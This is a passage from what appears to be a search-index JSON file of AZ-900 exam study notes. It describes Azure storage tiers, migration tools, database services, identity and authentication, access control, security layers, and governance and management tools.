        • Serving images or documents directly to a browser.
        • Storing files for distributed access.
        • Streaming video and audio.
        • Storing data for backup and restore, disaster recovery, and archiving.
        • Storing data for analysis by an on-premises or Azure-hosted service.

        Objects in blob storage can be accessed from anywhere in the world via HTTP or HTTPS. Users or client applications can access blobs via URLs, the Azure Storage REST API, Azure PowerShell, Azure CLI, or an Azure Storage client library.

        Azure Storage offers different access tiers for your blob storage:

        • Hot access tier: Optimized for storing data that is accessed frequently (for example, images for your website).
        • Cool access tier: Optimized for data that is infrequently accessed and stored for at least 30 days (for example, invoices for your customers).
        • Cold access tier: Optimized for storing data that is infrequently accessed and stored for at least 90 days.
        • Archive access tier: Appropriate for data that is rarely accessed and stored for at least 180 days, with flexible latency requirements (for example, long-term backups).

        Some considerations:

        • Hot, cool, and cold access tiers can be set at the account level. The archive access tier isn't available at the account level.
        • Hot, cool, cold, and archive tiers can be set at the blob level, during or after upload.
        • Data in the cool and cold access tiers can tolerate slightly lower availability, but still requires high durability, retrieval latency, and throughput characteristics similar to hot data. For cool and cold data, a lower availability service-level agreement (SLA) and higher access costs compared to hot data are acceptable trade-offs for lower storage costs.
        • Archive storage stores data offline and offers the lowest storage costs, but also the highest costs to rehydrate and access data.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-files","title":"Azure Files","text":"

        Azure File storage offers fully managed file shares in the cloud that are accessible via the industry standard Server Message Block (SMB) or Network File System (NFS) protocols. Azure Files file shares can be mounted concurrently by cloud or on-premises deployments. SMB Azure file shares are accessible from Windows, Linux, and macOS clients. NFS Azure Files shares are accessible from Linux or macOS clients.

        PowerShell cmdlets and Azure CLI can be used to create, mount, and manage Azure file shares as part of the administration of Azure applications. You can create and manage Azure file shares using Azure portal and Azure Storage Explorer.

        Applications running in Azure can access data in the share via file system I/O APIs. \u00a0In addition to System IO APIs, you can use Azure Storage Client Libraries or the Azure Storage REST API.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-queues","title":"Azure Queues","text":"

        Azure Queue storage is a service for storing large numbers of messages. Once stored, you can access the messages from anywhere in the world via authenticated calls using HTTP or HTTPS. A queue can contain as many messages as your storage account has room for (potentially millions). Each individual message can be up to 64 KB in size. Queues are commonly used to create a backlog of work to process asynchronously.

        Queue storage can be combined with compute functions like Azure Functions to take an action when a message is received.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-disks","title":"Azure Disks","text":"

        Azure Disk storage, or Azure managed disks, are block-level storage volumes managed by Azure for use with Azure VMs. Conceptually, they\u2019re the same as a physical disk, but they\u2019re virtualized \u2013 offering greater resiliency and availability than a physical disk.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-tables","title":"Azure Tables","text":"

        Azure Table storage stores large amounts of structured data. Azure tables are a NoSQL datastore that accepts authenticated calls from inside and outside the Azure cloud.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-data-migration-options","title":"Azure data migration options","text":"

        Azure Migrate is a service that helps you migrate from an on-premises environment to the cloud: - Unified migration platform: A single portal to start, run, and track your migration to Azure. - Range of tools: Azure Migrate also integrates with other Azure services and tools, and with independent software vendor (ISV) offerings. - Assessment and migration: In the Azure Migrate hub, you can assess and migrate your on-premises infrastructure to Azure.

        Tools to help with migration:

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-migrate-discovery-and-assessment","title":"Azure Migrate: Discovery and assessment","text":"

        Discover and assess on-premises servers running on VMware, Hyper-V, and physical servers in preparation for migration to Azure.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-migrate-server-migration","title":"Azure Migrate: Server Migration","text":"

        Migrate VMware VMs, Hyper-V VMs, physical servers, other virtualized servers, and public cloud VMs to Azure.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#data-migration-assistant","title":"Data Migration Assistant","text":"

        Data Migration Assistant is a stand-alone tool to assess SQL Servers. It helps pinpoint potential problems blocking migration. It identifies unsupported features, new features that can benefit you after migration, and the right path for database migration.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-migration-service","title":"Azure Database Migration Service","text":"

        Migrate on-premises databases to Azure VMs running SQL Server, Azure SQL Database, or SQL Managed Instances.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-app-service-migration-assistant","title":"Azure App Service migration assistant","text":"

        Azure App Service migration assistant is a standalone tool to assess on-premises websites for migration to Azure App Service. Use Migration Assistant to migrate .NET and PHP web apps to Azure.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-data-box","title":"Azure Data Box","text":"

        Azure Data Box is a physical migration service that helps transfer large amounts of data in a quick, inexpensive, and reliable way. The secure data transfer is accelerated by shipping you a proprietary Data Box storage device that has a maximum usable storage capacity of 80 terabytes. The Data Box is transported to and from your datacenter via a regional carrier. A rugged case protects and secures the Data Box from damage during transit. You can order the Data Box device via the Azure portal to import or export data from Azure. Data Box is ideally suited to transfer data sizes larger than 40 TBs in scenarios with no to limited network connectivity.

        Use cases for importing data: - Onetime migration - when a large amount of on-premises data is moved to Azure. - Moving a media library from offline tapes into Azure to create an online media library. - Migrating your VM farm, SQL server, and applications to Azure. - Moving historical data to Azure for in-depth analysis and reporting using HDInsight. - Initial bulk transfer - when an initial bulk transfer is done using Data Box (seed) followed by incremental transfers over the network. - Periodic uploads - when large amount of data is generated periodically and needs to be moved to Azure.

        Use cases for exporting data: - Disaster recovery - when a copy of the data from Azure is restored to an on-premises network. - Security requirements - when you need to be able to export data out of Azure due to government or security requirements. - Migrate back to on-premises or to another cloud service provider - when you want to move all the data back to on-premises, or to another cloud service provider, export data via Data Box to migrate the workloads.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azcopy","title":"AzCopy","text":"

        In addition to large scale migration using services like Azure Migrate and Azure Data Box, Azure also has tools designed to help you move or interact with individual files or small file groups.

        AzCopy is a command-line utility that you can use to copy blobs or files to or from your storage account. Synchronizing blobs or files with AzCopy is one-direction synchronization. When you synchronize, you designated the source and destination, and AzCopy will copy files or blobs in that direction. It doesn't synchronize bi-directionally based on timestamps or other metadata.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-explorer","title":"Azure Storage Explorer","text":"

        In addition to large scale migration using services like Azure Migrate and Azure Data Box, Azure also has tools designed to help you move or interact with individual files or small file groups.

        Azure Storage Explorer is a standalone app that provides a graphical interface to manage files and blobs in your Azure Storage Account. It works on Windows, macOS, and Linux operating systems and uses AzCopy on the backend to perform all of the file and blob management tasks.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-file-sync","title":"Azure File Sync","text":"

        In addition to large scale migration using services like Azure Migrate and Azure Data Box, Azure also has tools designed to help you move or interact with individual files or small file groups.

        Azure File Sync is a tool that lets you centralize your file shares in Azure Files and keep the flexibility, performance, and compatibility of a Windows file server.

        With Azure File Sync, you can:

        • Use any protocol that's available on Windows Server to access your data locally, including SMB, NFS, and FTPS.
        • Have as many caches as you need across the world.
        • Replace a failed local server by installing Azure File Sync on a new server in the same datacenter.
        • Configure cloud tiering so the most frequently accessed files are replicated locally, while infrequently accessed files are kept in the cloud until requested.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-data-services","title":"Azure Data Services","text":"

        Key databases in Azure: Azure Cosmos DB, Azure SQL Database, and Azure Database Migration Service.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#cosmos-db","title":"Cosmos DB","text":"

        Azure Cosmos DB is a multimodel database service that enables to scale data out to multiple Azure regions across the world. This enables us to build applications available at a global scale

        Fast, distributed NoSQL and relational database at any scale (additionally it supports SQL for querying data stored in Cosmos). Ideal for developing high-performance applications of any size or scale with a fully managed and serverless distributed database supporting open-source PostgreSQL, MongoDB, and Apache Cassandra as well as Java, Node.JS, Python, and .NET.

        Use case: As an example, Cosmos DB provides a highly scalable solution to build and query graph-based data solutions.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-sql-database","title":"Azure SQL Database","text":"

        Azure SQL Database is a PaaS offering in which Microsoft hosts the SQL platform and manages maintenance like upgrades and patching, monitoring, and all activities to assure a 99.99% uptime.

        Additionally, it's a relational database as a service (DaaS) based on the latest stable version of the Microsoft SQL Server database engine.

        Use case: Flexible, fast, and elastic SQL database for your new apps. Build apps that scale with a fully managed and intelligent SQL database built for the cloud.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-migration-service_1","title":"Azure Database Migration Service","text":"

        It's a fully-managed service designed to enable seamless migrations from multiple database sources to Azure data platforms with minimal downtime.

        It uses the Microsoft Data Migration Assistant to generate assessment reports previous to a migration.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#sql-database-elastic-pools","title":"SQL Database elastic pools","text":"

        Just like Azure VM\u00a0Scale Sets are used with VMs, you can use\u00a0Elastic Pools\u00a0with Azure SQL\u00a0Databases!

        SQL Database elastic pools\u00a0are a simple, cost-effective solution for managing and scaling multiple databases that have varying and unpredictable usage demands. The databases in an elastic pool are on a single Azure SQL Database server and share a set number of resources at a set price. Elastic pools in Azure SQL Database enable SaaS developers to optimize the price performance for a group of databases within a prescribed budget while delivering performance elasticity for each database.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#other-database-services-postgresql-mariadb-mysql-redis-cache","title":"Other database services: PostgreSQL, MariaDB, MySQL, Redis Cache","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-for-postgresql","title":"Azure Database for PostgreSQL","text":"

        Fully managed, intelligent, and scalable PostgreSQL database.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-for-mysql","title":"Azure Database for MySQL","text":"

        Scalable, open-source MySQL database

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-for-mariadb","title":"Azure Database for MariaDB","text":"

        Fully managed, community MariaDB

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cache-for-redis","title":"Azure Cache for Redis","text":"

        Distributed, in-memory, scalable caching

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-identity-access-and-security","title":"Azure identity, access, and security","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-directory-services","title":"Azure directory services","text":"

        When you secure identities on-premises with Active Directory, Microsoft doesn't monitor sign-in attempts. When you connect Active Directory with Azure AD, Microsoft can help protect you by detecting suspicious sign-in attempts at no extra cost.

        Azure AD provides services such as: - Authentication: This includes verifying identity to access applications and resources. It also includes providing functionality such as self-service password reset, multifactor authentication, a custom list of banned passwords, and smart lockout services. - Single sign-on: Single sign-on (SSO) enables you to remember only one username and one password to access multiple applications. A single identity is tied to a user, which simplifies the security model. As users change roles or leave an organization, access modifications are tied to that identity, which greatly reduces the effort needed to change or disable accounts. - Application management: You can manage your cloud and on-premises apps by using Azure AD. Features like Application Proxy, SaaS apps, the My Apps portal, and single sign-on provide a better user experience. - Device management: Along with accounts for individual people, Azure AD supports the registration of devices. Registration enables devices to be managed through tools like Microsoft Intune. It also allows for device-based Conditional Access policies to restrict access attempts to only those coming from known devices, regardless of the requesting user account.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ad-connect","title":"Azure AD Connect","text":"

        If you had an on-premises environment running Active Directory and a cloud deployment using Azure AD, you would need to maintain two identity sets. However, you can connect Active Directory with Azure AD, enabling a consistent identity experience between cloud and on-premises.

        One method of connecting Azure AD with your on-premises AD is using Azure AD Connect. Azure AD Connect synchronizes user identities between on-premises Active Directory and Azure AD. Azure AD Connect synchronizes changes between both identity systems, so you can use features like SSO, multifactor authentication, and self-service password reset under both systems.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-active-directory-domain-services-azure-ad-ds","title":"Azure Active Directory Domain Services (Azure AD DS)","text":"

        Azure Active Directory Domain Services (Azure AD DS) is a service that provides managed domain services such as domain join, group policy, lightweight directory access protocol (LDAP), and Kerberos/NTLM authentication. Just like Azure AD lets you use directory services without having to maintain the infrastructure supporting it, with Azure AD DS, you get the benefit of domain services without the need to deploy, manage, and patch domain controllers (DCs) in the cloud.

        Azure AD DS integrates with your existing Azure AD tenant. This integration lets users sign into services and applications connected to the managed domain using their existing credentials.

        How does Azure AD DS work? When you create an Azure AD DS managed domain, you define a unique namespace. This namespace is the domain name. Two Windows Server domain controllers are then deployed into your selected Azure region. This deployment of DCs is known as a replica set. You don't need to manage, configure, or update these DCs. The Azure platform handles the DCs as part of the managed domain, including backups and encryption at rest using Azure Disk Encryption.

        A managed domain is configured to perform a one-way synchronization from Azure AD to Azure AD DS. You can create resources directly in the managed domain, but they aren't synchronized back to Azure AD.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-authentication-services","title":"Azure authentication services","text":"

        Authentication is the process of establishing the identity of a person, service, or device. Azure supports multiple authentication methods, including standard passwords, single sign-on (SSO), multifactor authentication (MFA), and passwordless.

        Single sign-on (SSO) enables a user to sign in one time and use that credential to access multiple resources and applications from different providers. Single sign-on is only as secure as the initial authenticator because the subsequent connections are all based on the security of the initial authenticator.

        Multifactor authentication (MFA) is the process of prompting a user for an extra form (or factor) of identification during the sign-in process. These factors fall into three categories:

        • Something the user knows \u2013 this might be a challenge #### Question.
        • Something the user has \u2013 this might be a code that's sent to the user's mobile phone.
        • Something the user is \u2013 this is typically some sort of biometric property, such as a fingerprint or face scan.

        Passwordless authentication methods are more convenient because the password is removed and replaced with something you have, plus something you are, or something you know. Passwordless authentication needs to be set up on a device before it can work.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ad-multi-factor-authentication","title":"Azure AD Multi-Factor Authentication","text":"

        Azure AD Multi-Factor Authentication is a Microsoft service that provides multifactor authentication capabilities. Azure AD Multi-Factor Authentication enables users to choose an additional form of authentication during sign-in, such as a phone call or mobile app notification.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#windows-hello-for-business","title":"Windows Hello for Business","text":"

        Each organization has different needs when it comes to authentication. Microsoft global Azure and Azure Government offer this passwordless authentication service that integrate with Azure Active Directory (Azure AD).

        Windows Hello for Business is ideal for information workers that have their own designated Windows PC. The biometric and PIN credentials are directly tied to the user's PC, which prevents access from anyone other than the owner. With public key infrastructure (PKI) integration and built-in support for single sign-on (SSO), Windows Hello for Business provides a convenient method for seamlessly accessing corporate resources on-premises and in the cloud.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-authenticator-app","title":"Microsoft Authenticator App","text":"

        Each organization has different needs when it comes to authentication. Microsoft global Azure and Azure Government offer this passwordless authentication service that integrate with Azure Active Directory (Azure AD).

        The Authenticator App turns any iOS or Android phone into a strong, passwordless credential. Users can sign-in to any platform or browser by getting a notification to their phone, matching a number displayed on the screen to the one on their phone, and then using their biometric (touch or face) or PIN to confirm.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#fido2-security-keys","title":"FIDO2 security keys","text":"

        Each organization has different needs when it comes to authentication. Microsoft global Azure and Azure Government offer this passwordless authentication service that integrate with Azure Active Directory (Azure AD).

        Fast Identity Online (FIDO) is an open standard for passwordless authentication. FIDO allows users and organizations to leverage the standard to sign-in to their resources without a username or password by using an external security key or a platform key built into a device. Users can register and then select a FIDO2 security key at the sign-in interface as their main means of authentication. These FIDO2 security keys are typically USB devices, but could also use Bluetooth or NFC. With a hardware device that handles the authentication, the security of an account is increased as there's no password that could be exposed or guessed.

        The FIDO (Fast IDentity Online) Alliance helps to promote open authentication standards and reduce the use of passwords as a form of authentication. FIDO2 is the latest standard that incorporates the web authentication (WebAuthn) standard.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ad-external-identities","title":"Azure AD external identities","text":"

        Azure AD External Identities refers to all the ways you can securely interact with users outside of your organization.

        • Business to business (B2B) collaboration\u00a0- Collaborate with external users by letting them use their preferred identity to sign-in to your Microsoft applications or other enterprise applications (SaaS apps, custom-developed apps, etc.). B2B collaboration users are represented in your directory, typically as guest users.
        • B2B direct connect\u00a0- Establish a mutual, two-way trust with another Azure AD organization for seamless collaboration. B2B direct connect currently supports Teams shared channels, enabling external users to access your resources from within their home instances of Teams. B2B direct connect users aren't represented in your directory, but they're visible from within the Teams shared channel and can be monitored in Teams admin center reports.
        • Azure AD business to customer (B2C)\u00a0- Publish modern SaaS apps or custom-developed apps (excluding Microsoft apps) to consumers and customers, while using Azure AD B2C for identity and access management.

        Depending on how you want to interact with external organizations and the types of resources you need to share, you can use a combination of these capabilities.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-conditional-access","title":"Azure conditional access","text":"

        Conditional Access is a tool that Azure Active Directory uses to allow (or deny) access to resources based on identity signals. These signals include who the user is, where the user is, and what device the user is requesting access from. During sign-in, Conditional Access collects signals from the user, makes decisions based on those signals, and then enforces that decision by allowing or denying the access request or challenging for a multifactor authentication response.

        Conditional Access is useful when you need to:

        • Require multifactor authentication (MFA) to access an application depending on the requester\u2019s role, location, or network. For example, you could require MFA for administrators but not regular users or for people connecting from outside your corporate network.
        • Require access to services only through approved client applications. For example, you could limit which email applications are able to connect to your email service.
        • Require users to access your application only from managed devices. A managed device is a device that meets your standards for security and compliance.
        • Block access from untrusted sources, such as access from unknown or unexpected locations.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-resource-manager-for-role-based-access-control-rbac","title":"Azure Resource Manager for role-based access control (RBAC)","text":"

        Azure Resource Manager is a management service that provides a way to organize and secure your cloud resources.

        Azure provides built-in roles that describe common access rules for cloud resources. You can also define your own roles.

        Scopes include:

        • A management group (a collection of multiple subscriptions).
        • A single subscription.
        • A resource group.
        • A single resource.

        Azure RBAC is hierarchical, in that when you grant access at a parent scope, those permissions are inherited by all child scopes. For example:

        • When you assign the Owner role to a user at the management group scope, that user can manage everything in all subscriptions within the management group.
        • When you assign the Reader role to a group at the subscription scope, the members of that group can view every resource group and resource within the subscription.

        Azure RBAC is enforced on any action that's initiated against an Azure resource that passes through Azure Resource Manager. Resource Manager is a management service that provides a way to organize and secure your cloud resources.

        You typically access Resource Manager from the Azure portal, Azure Cloud Shell, Azure PowerShell, and the Azure CLI.

        Azure RBAC doesn't enforce access permissions at the application or data level. Application security must be handled by your application.

        Azure RBAC uses an allow model. When you're assigned a role, Azure RBAC allows you to perform actions within the scope of that role. If one role assignment grants you read permissions to a resource group and a different role assignment grants you write permissions to the same resource group, you have both read and write permissions on that resource group.

        You can have up to 2000 role assignments in each subscription.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#zero-trust-model","title":"Zero trust model","text":"

        Traditionally, corporate networks were restricted, protected, and generally assumed safe. Only managed computers could join the network, VPN access was tightly controlled, and personal devices were frequently restricted or blocked.

        The Zero Trust model flips that scenario. Instead of assuming that a device is safe because it\u2019s within the corporate network, it requires everyone to authenticate. Then grants access based on authentication rather than location.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#defense-in-depth","title":"Defense-in-depth","text":"

        A defense-in-depth strategy uses a series of mechanisms to slow the advance of an attack that aims at acquiring unauthorized access to data.

        This approach removes reliance on any single layer of protection. It slows down an attack and provides alert information that security teams can act upon, either automatically or manually.

        Here's a brief overview of the role of each layer:

        • The physical security layer is the first line of defense to protect computing hardware in the datacenter. Physically securing access to buildings and controlling access to computing hardware within the datacenter are the first line of defense.
        • The identity and access layer controls access to infrastructure and change control. The identity and access layer is all about ensuring that identities are secure, that access is granted only to what's needed, and that sign-in events and changes are logged.
        • The perimeter layer uses distributed denial of service (DDoS) protection to filter large-scale attacks before they can cause a denial of service for users. The network perimeter protects from network-based attacks against your resources. Identifying these attacks, eliminating their impact, and alerting you when they happen are important ways to keep your network secure. \u00a0DDoS protection + Firewalls.
        • The network layer limits communication between resources through segmentation and access controls. - Limit communication between resources. - Deny by default. - Restrict inbound internet access and limit outbound access where appropriate. - Implement secure connectivity to on-premises networks.
        • The compute layer secures access to virtual machines. - Secure access to virtual machines. - Implement endpoint protection on devices and keep systems patched and current.
        • The application layer helps ensure that applications are secure and free of security vulnerabilities. - Store sensitive application secrets in a secure storage medium. - Make security a design requirement for all application development.
        • The data layer controls access to business and customer data that you need to protect.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-defender-for-cloud","title":"Microsoft Defender for Cloud","text":"

        Defender for Cloud is a monitoring tool for security posture management and threat protection. It monitors your cloud, on-premises, hybrid, and multi-cloud environments to provide guidance and notifications aimed at strengthening your security posture.

        When necessary, Defender for Cloud can automatically deploy a Log Analytics agent to gather security-related data. For Azure machines, deployment is handled directly. For hybrid and multi-cloud environments, Microsoft Defender plans are extended to non Azure machines with the help of Azure Arc. \u00a0Cloud security posture management (CSPM) features are extended to multi-cloud machines without the need for any agents.

        Defender for Cloud helps you detect threats across:

        • Azure PaaS services \u2013 Detect threats targeting Azure services. You can also perform anomaly detection on your Azure activity logs using the native integration with Microsoft Defender for Cloud Apps (formerly known as Microsoft Cloud App Security).
        • Azure data services \u2013 Defender for Cloud includes capabilities that help you automatically classify your data in Azure SQL.
        • Networks \u2013 Defender for Cloud helps you limit exposure to brute force attacks. By reducing access to virtual machine ports, using the just-in-time VM access, you can harden your network by preventing unnecessary access.

        Defender for Cloud can also protect resources in other clouds (such as AWS and GCP). For example, if you've connected an Amazon Web Services (AWS) account to an Azure subscription, you can enable any of these protections:

        • Defender for Cloud's CSPM features extend to your AWS resources. This agentless plan assesses your AWS resources according to AWS-specific security recommendations, and includes the results in the secure score. The resources will also be assessed for compliance with built-in standards specific to AWS (AWS CIS, AWS PCI DSS, and AWS Foundational Security Best Practices). Defender for Cloud's asset inventory page is a multi-cloud enabled feature helping you manage your AWS resources alongside your Azure resources.
        • Microsoft Defender for Containers extends its container threat detection and advanced defenses to your Amazon EKS Linux clusters.
        • Microsoft Defender for Servers brings threat detection and advanced defenses to your Windows and Linux EC2 instances.

        Defender for Cloud \u00a0fills three vital needs:

        • Continuously assess \u2013 Know your security posture. Identify and track vulnerabilities. Defender for cloud helps you continuously assess your environment. Defender for Cloud includes vulnerability assessment solutions for your virtual machines, container registries, and SQL servers. Microsoft Defender for servers includes automatic, native integration with Microsoft Defender for Endpoint.
        • Secure: Harden resources and services with Azure Security Benchmark. In Defender for Cloud, you can set your policies to run on management groups, across subscriptions, and even for a whole tenant. Defender for Cloud assesses if new resources are configured according to security best practices. If not, they're flagged and you get a prioritized list of recommendations for what you need to fix. In this way, Defender for Cloud enables you not just to set security policies, but to apply secure configuration standards across your resources. To help you understand how important each recommendation is to your overall security posture, Defender for Cloud groups the recommendations into security controls and adds a secure score value to each control.
        • Defend \u2013 Detect and resolve threats to resources, workloads, and services. When Defender for Cloud detects a threat in any area of your environment, it generates a security alert. Security alerts describe details of the affected resources, suggest remediation steps, and provide, in some cases, an option to trigger a logic app in response
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#governance-and-compliance-features-and-tools","title":"Governance and compliance: features and tools","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-purview","title":"Microsoft Purview","text":"

        Microsoft Purview is a family of data governance, risk, and compliance solutions that helps you get a single, unified view into your data. Microsoft Purview brings insights about your on-premises, multicloud, and software-as-a-service data together. It provides:

        • Automated data discovery
        • Sensitive data classification
        • End-to-end data lineage

        Microsoft Purview risk and compliance solutions: Microsoft 365 features as a core component of the Microsoft Purview risk and compliance solutions. Microsoft Teams, OneDrive, and Exchange are just some of the Microsoft 365 services that Microsoft Purview uses to help manage and monitor your data.

        Unified data governance: Microsoft Purview has robust, unified data governance solutions that help manage your on-premises, multicloud, and software as a service data. Microsoft Purview\u2019s robust data governance capabilities enable you to manage your data stored in Azure, SQL and Hive databases, locally, and even in other clouds like Amazon S3.

        Microsoft Purview\u2019s unified data governance helps your organization:

        • Create an up-to-date map of your entire data estate that includes data classification and end-to-end lineage.
        • Identify where sensitive data is stored in your estate.
        • Create a secure environment for data consumers to find valuable data.
        • Generate insights about how your data is stored and used.
        • Manage access to the data in your estate securely and at scale.

        Which feature in the Microsoft Purview governance portal should you use to manage access to data sources and datasets?

        • Incorrect: Data Catalog \u2013\u2013 This enables data discovery.
        • Incorrect: Data Sharing \u2013\u2013 This shares data within and between organizations.
        • Incorrect: Data Estate Insights \u2013\u2013 This accesses data estate health.
        • Correct: Data Policy \u2013\u2013 This governs access to data.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-policy","title":"Azure Policy","text":"

        Azure Policy is a service in Azure that enables you to create, assign, and manage policies that control or audit your resources.

        Azure Policy enables you to define both individual policies and groups of related policies, known as initiatives. Azure Policy evaluates your resources and highlights resources that aren't compliant with the policies you've created. Azure Policy can also prevent noncompliant resources from being created.

        Azure Policies can be set at each level, enabling you to set policies on a specific resource, resource group, subscription, and so on. Additionally, Azure Policies are inherited, so if you set a policy at a high level, it will automatically be applied to all of the groupings that fall within the parent.

        Azure Policy comes with built-in policy and initiative definitions for Storage, Networking, Compute, Security Center, and Monitoring. In some cases, Azure Policy can automatically remediate noncompliant resources and configurations to ensure the integrity of the state of the resources. This applies, for example, in the tagging of resources. If you have a specific resource that you don\u2019t want Azure Policy to automatically fix, you can flag that resource as an exception.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-initiative-policies","title":"Azure initiative policies","text":"

        An Azure Policy initiative is a way of grouping related policies together. The initiative definition contains all of the policy definitions to help track your compliance state for a larger goal. For instance, the Enable Monitoring in Azure Security Center initiative contains over 100 separate policy definitions. Its goal is to monitor all available security recommendations for all Azure resource types in Azure Security Center.

        Under this initiative, the following policy definitions are included:

        • Monitor unencrypted SQL Database in Security Center\u00a0This policy monitors for unencrypted SQL databases and servers.
        • Monitor OS vulnerabilities in Security Center\u00a0This policy monitors servers that don't satisfy the configured OS vulnerability baseline.
        • Monitor missing Endpoint Protection in Security Center\u00a0This policy monitors for servers that don't have an installed endpoint protection agent.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#resource-locks","title":"Resource locks","text":"

        Resource locks prevent resources from being deleted or updated, depending on the type of lock. Resource locks can be applied to individual resources, resource groups, or even an entire subscription. Resource locks are inherited, meaning that if you place a resource lock on a resource group, all of the resources within the resource group will also have the resource lock applied.

        There are two types of resource locks, one that prevents users from deleting and one that prevents users from changing or deleting a resource.

        • Delete means authorized users can still read and modify a resource, but they can't delete the resource.
        • ReadOnly means authorized users can read a resource, but they can't delete or update the resource. Applying this lock is similar to restricting all authorized users to the permissions granted by the Reader role.

        You can manage resource locks from the Azure portal, PowerShell, the Azure CLI, or from an Azure Resource Manager template. To view, add, or delete locks in the Azure portal, go to the Settings section of any resource's Settings pane in the Azure portal. To modify a locked resource, you must first remove the lock. After you remove the lock, you can apply any action you have permissions to perform. Resource locks apply regardless of RBAC permissions. Even if you're an owner of the resource, you must still remove the lock before you can perform the blocked activity.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#service-trust-portal","title":"Service Trust portal","text":"

        The Microsoft Service Trust Portal is a portal that provides access to various content, tools, and other resources about Microsoft security, privacy, and compliance practices.

        You can access the Service Trust Portal at\u00a0https://servicetrust.microsoft.com/.

        The Service Trust Portal features and content are accessible from the main menu. The categories on the main menu are:

        • Service Trust Portal\u00a0provides a quick access hyperlink to return to the Service Trust Portal home page.
        • My Library\u00a0lets you save (or pin) documents to quickly access them on your My Library page. You can also set up to receive notifications when documents in your My Library are updated.
        • All Documents\u00a0is a single landing place for documents on the service trust portal. From\u00a0All Documents, you can pin documents to have them show up in your\u00a0My Library.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#key-azure-management-tools","title":"Key Azure Management Tools","text":"

        There are several tools at your disposal to manage Azure resources and environments. They include the Azure Portal, Azure PowerShell, Azure CLI, the Azure Mobile App, and ARM templates.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-portal","title":"Azure Portal","text":"

        The Azure portal is a web-based user interface that you can use to access almost every feature of Azure. It can be used to visually understand and manage your Azure environment, while Azure PowerShell allows you to quickly perform one-off tasks and to script tasks as needed. Azure PowerShell is available for Windows, Linux, and Mac, and you can access it in a web browser via Azure Cloud Shell.

        Azure Portal does not offer a way to automate repetitive tasks.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cloud-shell","title":"Azure Cloud Shell","text":"

        Browser-based scripting environment that is accessible from Azure Portal. It requires a storage account. It allows you to choose the shell experience that suits you best.

